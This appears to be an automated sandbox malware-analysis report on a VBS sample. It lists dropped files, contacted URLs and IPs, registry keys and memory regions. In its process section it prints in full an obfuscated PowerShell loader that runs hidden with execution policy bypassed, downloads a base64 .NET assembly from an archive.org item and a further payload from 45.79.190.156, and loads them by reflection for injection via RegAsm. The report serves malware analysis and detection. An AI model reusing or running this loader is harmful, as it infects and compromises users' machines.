Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
aK7smea2Vv.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3yc2gw1.wej.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jglf2n3i.53q.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaloj2y0.fcc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzfqfe2t.fvg.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\aK7smea2Vv.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEQzcnKyd1cmwgPSBrZicrJ3NodHRwczovL2knKydhNjAwMTAwJysnLnVzJysnLmFyY2hpdmUub3JnLycrJzI0L2l0JysnZW1zL2RldGEnKydoLW5vdGUtJysndi9EZXRhaE4nKydvJysndGVWLnR4dGtmJysncztEQzdiYXNlNjRDb250ZW50ID0gJysnKE5ldy1PYmplY3QgJysnU3lzdGVtLk5lJysndC5XZScrJ2InKydDbGllbnQpLicrJ0Rvd25sb2FkU3RyaW4nKydnKERDN3VybCknKyc7JysnREM3YmluYXJ5Q29udGVudCA9IFtTeXN0JysnZW0nKycuQ29udmVydF06JysnOkZybycrJ21CYXNlNjRTdHJpbmcnKycoREM3YmFzZTY0Q29udGVudCk7REM3YXNzZW1iJysnbHknKycgPSBbUicrJ2VmbGUnKydjdGlvbi5BJysnc3NlbWJsJysneV06OkxvYWQoREM3JysnYmluJysnYXJ5QycrJ29uJysndGVudCknKyc7REM3dHknKydwZScrJyA9IERDN2Fzc2VtYmx5LkdldFR5cGUoa2ZzUicrJ3VuUCcrJ0UnKycuSG9tJysnZWtmcyk7REM3JysnbScrJ2V0aG9kJysnID0nKycgREM3dHlwJysnZScrJy4nKydHZXQnKydNZXQnKydob2QoJysna2ZzVicrJ0EnKydJaycrJ2ZzJysnKTtEQzdtZScrJ3Rob2QnKycuSW52b2tlKERDJysnN251bGwsJysnIFtvYmplY3RbXV1AKGsnKydmc3R4dC4nKydGRFInKydXLzA2NS82JysnNTEuMDkxLicrJzk3LjU0Ly86cHR0aCcrJ2tmcyAsIGtmc2Rlc2F0aXZhZG9rZnMgLCBrZnNkZXNhdGl2JysnYWQnKydvaycrJ2YnKydzJysnICcrJywga2ZzZGVzYXQnKydpJysndmFkbycrJ2tmcyxrZnMnKydSZWdBc21rZnMnKycsa2ZzJysna2ZzKScrJyknKS5yRVBMQUNFKChbY2hBcl02OCtbY2hBcl02NytbY2hBcl01NSksW1NUUklOR11bY2hBcl0zNikuckVQTEFDRSgna2ZzJyxbU1RSSU5HXVtjaEFyXTM5KXwgaUVY';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"('DC7'+'url = kf'+'shttps://i'+'a600100'+'.us'+'.archive.org/'+'24/it'+'ems/deta'+'h-note-'+'v/DetahN'+'o'+'teV.txtkf'+'s;DC7base64Content
= '+'(New-Object '+'System.Ne'+'t.We'+'b'+'Client).'+'DownloadStrin'+'g(DC7url)'+';'+'DC7binaryContent = [Syst'+'em'+'.Convert]:'+':Fro'+'mBase64String'+'(DC7base64Content);DC7assemb'+'ly'+'
= [R'+'efle'+'ction.A'+'ssembl'+'y]::Load(DC7'+'bin'+'aryC'+'on'+'tent)'+';DC7ty'+'pe'+' = DC7assembly.GetType(kfsR'+'unP'+'E'+'.Hom'+'ekfs);DC7'+'m'+'ethod'+'
='+' DC7typ'+'e'+'.'+'Get'+'Met'+'hod('+'kfsV'+'A'+'Ik'+'fs'+');DC7me'+'thod'+'.Invoke(DC'+'7null,'+' [object[]]@(k'+'fstxt.'+'FDR'+'W/065/6'+'51.091.'+'97.54//:ptth'+'kfs
, kfsdesativadokfs , kfsdesativ'+'ad'+'ok'+'f'+'s'+' '+', kfsdesat'+'i'+'vado'+'kfs,kfs'+'RegAsmkfs'+',kfs'+'kfs)'+')').rEPLACE(([chAr]68+[chAr]67+[chAr]55),[STRING][chAr]36).rEPLACE('kfs',[STRING][chAr]39)|
iEX"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtkfs;DC7base64Content
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
|
207.241.227.240
|
||
|
http://45.79.190.156p
|
unknown
|
||
|
http://45.79.190.156
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://ia600100.us.archive.org
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://45.79.190.156/560/WRDF.txt
|
45.79.190.156
|
||
|
http://ia600100.us.archive.org
|
unknown
|
||
|
https://ia600100.us.arX(p
|
unknown
|
||
|
http://45.79.190.156(
|
unknown
|
||
|
http://crl.msoft
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ia600100.us.archive.org
|
207.241.227.240
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
45.79.190.156
|
unknown
|
United States
|
||
|
207.241.227.240
|
ia600100.us.archive.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2519061B000
|
trusted library allocation
|
page read and write
|
|
|
|
251EE1E0000
|
trusted library section
|
page read and write
|
|
|
|
251EBD15000
|
heap
|
page read and write
|
||
|
7FF886B4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886BF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
2968F810000
|
heap
|
page read and write
|
||
|
2968F928000
|
heap
|
page read and write
|
||
|
7FF886C26000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C4627D6000
|
trusted library allocation
|
page read and write
|
||
|
1C46055E000
|
heap
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
1C47A5C0000
|
heap
|
page read and write
|
||
|
1C4624DB000
|
trusted library allocation
|
page read and write
|
||
|
1C4625AB000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
251EBC90000
|
heap
|
page read and write
|
||
|
25180420000
|
trusted library allocation
|
page read and write
|
||
|
251EDEAE000
|
heap
|
page read and write
|
||
|
7FF886C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
251EBC40000
|
heap
|
page read and write
|
||
|
251EDE30000
|
heap
|
page read and write
|
||
|
251EBD56000
|
heap
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CE2000
|
trusted library allocation
|
page read and write
|
||
|
1C4607F0000
|
heap
|
page read and write
|
||
|
2969126A000
|
heap
|
page read and write
|
||
|
2969131F000
|
heap
|
page read and write
|
||
|
C46B77E000
|
stack
|
page read and write
|
||
|
2969130B000
|
heap
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
296918AC000
|
heap
|
page read and write
|
||
|
1C46055A000
|
heap
|
page read and write
|
||
|
2968F92B000
|
heap
|
page read and write
|
||
|
2968F880000
|
heap
|
page read and write
|
||
|
1C460450000
|
heap
|
page read and write
|
||
|
29691731000
|
heap
|
page read and write
|
||
|
251EDB70000
|
heap
|
page execute and read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D22000
|
trusted library allocation
|
page read and write
|
||
|
1C46252C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
1C462460000
|
heap
|
page execute and read and write
|
||
|
AB8BBFE000
|
stack
|
page read and write
|
||
|
296912D7000
|
heap
|
page read and write
|
||
|
251902FB000
|
trusted library allocation
|
page read and write
|
||
|
2519101B000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
2969131F000
|
heap
|
page read and write
|
||
|
7FF886EA0000
|
trusted library allocation
|
page read and write
|
||
|
2968F91D000
|
heap
|
page read and write
|
||
|
1C4624F9000
|
trusted library allocation
|
page read and write
|
||
|
1C460835000
|
heap
|
page read and write
|
||
|
7FF886B43000
|
trusted library allocation
|
page execute and read and write
|
||
|
2968F91E000
|
heap
|
page read and write
|
||
|
C46BCFF000
|
stack
|
page read and write
|
||
|
29691313000
|
heap
|
page read and write
|
||
|
251EE090000
|
heap
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886B6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C47A500000
|
heap
|
page execute and read and write
|
||
|
7FF886E99000
|
trusted library allocation
|
page read and write
|
||
|
1C4606E0000
|
trusted library allocation
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
251803E1000
|
trusted library allocation
|
page read and write
|
||
|
296912AA000
|
heap
|
page read and write
|
||
|
1C472502000
|
trusted library allocation
|
page read and write
|
||
|
251EBDCB000
|
heap
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
251EDC7D000
|
heap
|
page read and write
|
||
|
7FF886E94000
|
trusted library allocation
|
page read and write
|
||
|
1C46054F000
|
heap
|
page read and write
|
||
|
251ED680000
|
heap
|
page read and write
|
||
|
7FF886CF1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
1C460830000
|
heap
|
page read and write
|
||
|
1C460599000
|
heap
|
page read and write
|
||
|
1C4625EF000
|
trusted library allocation
|
page read and write
|
||
|
2969126C000
|
heap
|
page read and write
|
||
|
296917D0000
|
heap
|
page read and write
|
||
|
D8E84FB000
|
stack
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
1C460606000
|
heap
|
page read and write
|
||
|
1C462491000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CCA000
|
trusted library allocation
|
page read and write
|
||
|
C46B8FF000
|
stack
|
page read and write
|
||
|
2968F8A9000
|
heap
|
page read and write
|
||
|
AB8B5FE000
|
stack
|
page read and write
|
||
|
251EBB40000
|
heap
|
page read and write
|
||
|
2968FAB0000
|
heap
|
page read and write
|
||
|
2968F8B0000
|
heap
|
page read and write
|
||
|
29691263000
|
heap
|
page read and write
|
||
|
29691272000
|
heap
|
page read and write
|
||
|
C46B9FE000
|
stack
|
page read and write
|
||
|
25181C07000
|
trusted library allocation
|
page read and write
|
||
|
2969127E000
|
heap
|
page read and write
|
||
|
2969128D000
|
heap
|
page read and write
|
||
|
1C460570000
|
heap
|
page read and write
|
||
|
7FF886B44000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
|
2968F948000
|
heap
|
page read and write
|
||
|
2968F8FE000
|
heap
|
page read and write
|
||
|
1C4624AB000
|
trusted library allocation
|
page read and write
|
||
|
2968F928000
|
heap
|
page read and write
|
||
|
AB8BC7B000
|
stack
|
page read and write
|
||
|
1C46259A000
|
trusted library allocation
|
page read and write
|
||
|
2968F8BD000
|
heap
|
page read and write
|
||
|
251ED6C0000
|
heap
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C47A532000
|
heap
|
page read and write
|
||
|
2968F8C0000
|
heap
|
page read and write
|
||
|
251EDD30000
|
heap
|
page read and write
|
||
|
2968F932000
|
heap
|
page read and write
|
||
|
25181CD1000
|
trusted library allocation
|
page read and write
|
||
|
1C462480000
|
heap
|
page read and write
|
||
|
C46B673000
|
stack
|
page read and write
|
||
|
251EDC10000
|
heap
|
page read and write
|
||
|
251EDE5E000
|
heap
|
page read and write
|
||
|
D8E7BFE000
|
stack
|
page read and write
|
||
|
251ED590000
|
trusted library allocation
|
page read and write
|
||
|
1C460597000
|
heap
|
page read and write
|
||
|
2968F7F0000
|
heap
|
page read and write
|
||
|
1C4629C1000
|
trusted library allocation
|
page read and write
|
||
|
1C4625EA000
|
trusted library allocation
|
page read and write
|
||
|
29691268000
|
heap
|
page read and write
|
||
|
7FF886CC1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2968F948000
|
heap
|
page read and write
|
||
|
29691311000
|
heap
|
page read and write
|
||
|
1C460601000
|
heap
|
page read and write
|
||
|
1C472491000
|
trusted library allocation
|
page read and write
|
||
|
1C460519000
|
heap
|
page read and write
|
||
|
2968F8AA000
|
heap
|
page read and write
|
||
|
2968F975000
|
heap
|
page read and write
|
||
|
1C462A90000
|
trusted library allocation
|
page read and write
|
||
|
251ED5A0000
|
heap
|
page readonly
|
||
|
251EDCEA000
|
heap
|
page read and write
|
||
|
29691830000
|
heap
|
page read and write
|
||
|
25180971000
|
trusted library allocation
|
page read and write
|
||
|
25181713000
|
trusted library allocation
|
page read and write
|
||
|
25180648000
|
trusted library allocation
|
page read and write
|
||
|
2968F912000
|
heap
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
2968FAB5000
|
heap
|
page read and write
|
||
|
7FF886B42000
|
trusted library allocation
|
page read and write
|
||
|
25180082000
|
trusted library allocation
|
page read and write
|
||
|
251ED6C5000
|
heap
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
C46B6FE000
|
stack
|
page read and write
|
||
|
1C460523000
|
heap
|
page read and write
|
||
|
251816CB000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BC0000
|
trusted library allocation
|
page read and write
|
||
|
251EDD10000
|
heap
|
page read and write
|
||
|
1C462597000
|
trusted library allocation
|
page read and write
|
||
|
2968F964000
|
heap
|
page read and write
|
||
|
7FF886B12000
|
trusted library allocation
|
page read and write
|
||
|
1C462A9A000
|
trusted library allocation
|
page read and write
|
||
|
2968F957000
|
heap
|
page read and write
|
||
|
7FF886B50000
|
trusted library allocation
|
page read and write
|
||
|
296912EB000
|
heap
|
page read and write
|
||
|
AB8B87E000
|
stack
|
page read and write
|
||
|
29691279000
|
heap
|
page read and write
|
||
|
1C460770000
|
heap
|
page execute and read and write
|
||
|
251902ED000
|
trusted library allocation
|
page read and write
|
||
|
D8E7FFF000
|
stack
|
page read and write
|
||
|
251803FD000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
25181987000
|
trusted library allocation
|
page read and write
|
||
|
2968F929000
|
heap
|
page read and write
|
||
|
2969127A000
|
heap
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
251ED620000
|
trusted library allocation
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
29691292000
|
heap
|
page read and write
|
||
|
296912AD000
|
heap
|
page read and write
|
||
|
251EBCD0000
|
heap
|
page read and write
|
||
|
2969131E000
|
heap
|
page read and write
|
||
|
1C460554000
|
heap
|
page read and write
|
||
|
7DF455D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2969130C000
|
heap
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
296917D2000
|
heap
|
page read and write
|
||
|
C46B97E000
|
stack
|
page read and write
|
||
|
251EBCE2000
|
heap
|
page read and write
|
||
|
7FF886B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886B5C000
|
trusted library allocation
|
page read and write
|
||
|
29691295000
|
heap
|
page read and write
|
||
|
2969127E000
|
heap
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
2968F97D000
|
heap
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
D8E82FE000
|
stack
|
page read and write
|
||
|
296917D2000
|
heap
|
page read and write
|
||
|
AB8B7FE000
|
stack
|
page read and write
|
||
|
AB8B67C000
|
stack
|
page read and write
|
||
|
7FF886BC6000
|
trusted library allocation
|
page read and write
|
||
|
29691275000
|
heap
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
1C47A5C3000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
2969127E000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
AB8B1DF000
|
stack
|
page read and write
|
||
|
1C47A8A0000
|
heap
|
page read and write
|
||
|
D8E7AFA000
|
stack
|
page read and write
|
||
|
251ED6CA000
|
heap
|
page read and write
|
||
|
1C460470000
|
heap
|
page read and write
|
||
|
25180424000
|
trusted library allocation
|
page read and write
|
||
|
296912F2000
|
heap
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
296912A0000
|
heap
|
page read and write
|
||
|
296913E0000
|
heap
|
page read and write
|
||
|
1C462955000
|
trusted library allocation
|
page read and write
|
||
|
29691273000
|
heap
|
page read and write
|
||
|
7FF886B14000
|
trusted library allocation
|
page read and write
|
||
|
251EDC50000
|
heap
|
page read and write
|
||
|
251EBCEE000
|
heap
|
page read and write
|
||
|
251EBC8E000
|
heap
|
page read and write
|
||
|
1C4724A0000
|
trusted library allocation
|
page read and write
|
||
|
2518192C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page read and write
|
||
|
296912CA000
|
heap
|
page read and write
|
||
|
7FF886B10000
|
trusted library allocation
|
page read and write
|
||
|
29691286000
|
heap
|
page read and write
|
||
|
251EDC00000
|
heap
|
page execute and read and write
|
||
|
251816DD000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CB0000
|
trusted library allocation
|
page read and write
|
||
|
296917D0000
|
heap
|
page read and write
|
||
|
2968F933000
|
heap
|
page read and write
|
||
|
2968F926000
|
heap
|
page read and write
|
||
|
251EDC5C000
|
heap
|
page read and write
|
||
|
AB8B57E000
|
stack
|
page read and write
|
||
|
296917D1000
|
heap
|
page read and write
|
||
|
251EDCE3000
|
heap
|
page read and write
|
||
|
25190072000
|
trusted library allocation
|
page read and write
|
||
|
251EBC85000
|
heap
|
page read and write
|
||
|
296918AD000
|
heap
|
page read and write
|
||
|
1C4606F0000
|
heap
|
page readonly
|
||
|
2969131F000
|
heap
|
page read and write
|
||
|
29691306000
|
heap
|
page read and write
|
||
|
7FF886CF2000
|
trusted library allocation
|
page read and write
|
||
|
D8E81FD000
|
stack
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
2968F888000
|
heap
|
page read and write
|
||
|
251811EB000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page read and write
|
||
|
D8E83FE000
|
stack
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
296912FF000
|
heap
|
page read and write
|
||
|
251EDC07000
|
heap
|
page execute and read and write
|
||
|
25190001000
|
trusted library allocation
|
page read and write
|
||
|
25181CCD000
|
trusted library allocation
|
page read and write
|
||
|
296912FA000
|
heap
|
page read and write
|
||
|
251EDE10000
|
heap
|
page execute and read and write
|
||
|
296912DA000
|
heap
|
page read and write
|
||
|
7FF886CF4000
|
trusted library allocation
|
page read and write
|
||
|
29691264000
|
heap
|
page read and write
|
||
|
7FF886CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C46059D000
|
heap
|
page read and write
|
||
|
251803F9000
|
trusted library allocation
|
page read and write
|
||
|
251EBC20000
|
heap
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
251EDCC8000
|
heap
|
page read and write
|
||
|
2968F958000
|
heap
|
page read and write
|
||
|
7FF886EA3000
|
trusted library allocation
|
page read and write
|
||
|
C46B87D000
|
stack
|
page read and write
|
||
|
7FF886B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
25181900000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B20000
|
trusted library allocation
|
page read and write
|
||
|
29691281000
|
heap
|
page read and write
|
||
|
2968F920000
|
heap
|
page read and write
|
||
|
251EDE9E000
|
heap
|
page read and write
|
||
|
2968F710000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
C46C84E000
|
stack
|
page read and write
|
||
|
25190010000
|
trusted library allocation
|
page read and write
|
||
|
25180602000
|
trusted library allocation
|
page read and write
|
||
|
1C4624D8000
|
trusted library allocation
|
page read and write
|
||
|
1C4625AE000
|
trusted library allocation
|
page read and write
|
||
|
1C4625B4000
|
trusted library allocation
|
page read and write
|
||
|
2968F948000
|
heap
|
page read and write
|
||
|
251813D4000
|
trusted library allocation
|
page read and write
|
||
|
29691730000
|
heap
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
C46BE7B000
|
stack
|
page read and write
|
||
|
251EBD0D000
|
heap
|
page read and write
|
||
|
29691269000
|
heap
|
page read and write
|
||
|
1C47A592000
|
heap
|
page read and write
|
||
|
1C4624B3000
|
trusted library allocation
|
page read and write
|
||
|
2968F8B1000
|
heap
|
page read and write
|
||
|
251ED570000
|
trusted library allocation
|
page read and write
|
||
|
2968F97E000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
C46BDFE000
|
stack
|
page read and write
|
||
|
2969176F000
|
heap
|
page read and write
|
||
|
1C47A507000
|
heap
|
page execute and read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
2968F948000
|
heap
|
page read and write
|
||
|
1C47A518000
|
heap
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
29691260000
|
heap
|
page read and write
|
||
|
251ED5E0000
|
trusted library allocation
|
page read and write
|
||
|
2969126F000
|
heap
|
page read and write
|
||
|
1C46259D000
|
trusted library allocation
|
page read and write
|
||
|
2968F964000
|
heap
|
page read and write
|
||
|
251EBC80000
|
heap
|
page read and write
|
||
|
2968F976000
|
heap
|
page read and write
|
||
|
1C460440000
|
heap
|
page read and write
|
||
|
25180222000
|
trusted library allocation
|
page read and write
|
||
|
C46C8CD000
|
stack
|
page read and write
|
||
|
C46BAF7000
|
stack
|
page read and write
|
||
|
1C47A630000
|
heap
|
page read and write
|
||
|
1C46292E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C47A510000
|
heap
|
page read and write
|
||
|
296912DF000
|
heap
|
page read and write
|
||
|
1C47A5E9000
|
heap
|
page read and write
|
||
|
251ED5B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
251803EB000
|
trusted library allocation
|
page read and write
|
||
|
1C462980000
|
trusted library allocation
|
page read and write
|
||
|
251816EF000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B2B000
|
trusted library allocation
|
page read and write
|
||
|
1C462A8E000
|
trusted library allocation
|
page read and write
|
||
|
1C4625A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
2968F923000
|
heap
|
page read and write
|
||
|
1C47A562000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
251803ED000
|
trusted library allocation
|
page read and write
|
||
|
1C4625B1000
|
trusted library allocation
|
page read and write
|
||
|
AB8B473000
|
stack
|
page read and write
|
||
|
251816C6000
|
trusted library allocation
|
page read and write
|
||
|
AB8B8FE000
|
stack
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
2968F964000
|
heap
|
page read and write
|
||
|
AB8BAFE000
|
stack
|
page read and write
|
||
|
29691274000
|
heap
|
page read and write
|
||
|
C46B3CE000
|
stack
|
page read and write
|
||
|
2968F90A000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
2968F927000
|
heap
|
page read and write
|
||
|
2969129A000
|
heap
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
25180001000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BFC000
|
trusted library allocation
|
page execute and read and write
|
||
|
29691264000
|
heap
|
page read and write
|
||
|
7FF886BCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
251816EB000
|
trusted library allocation
|
page read and write
|
||
|
D8E7EFF000
|
stack
|
page read and write
|
||
|
296912E6000
|
heap
|
page read and write
|
||
|
2969131D000
|
heap
|
page read and write
|
||
|
1C460510000
|
heap
|
page read and write
|
||
|
7FF886CFA000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
2968F964000
|
heap
|
page read and write
|
||
|
C46B7FE000
|
stack
|
page read and write
|
||
|
296912D6000
|
heap
|
page read and write
|
||
|
29691265000
|
heap
|
page read and write
|
||
|
7FF886E81000
|
trusted library allocation
|
page read and write
|
||
|
251EDCD1000
|
heap
|
page read and write
|
||
|
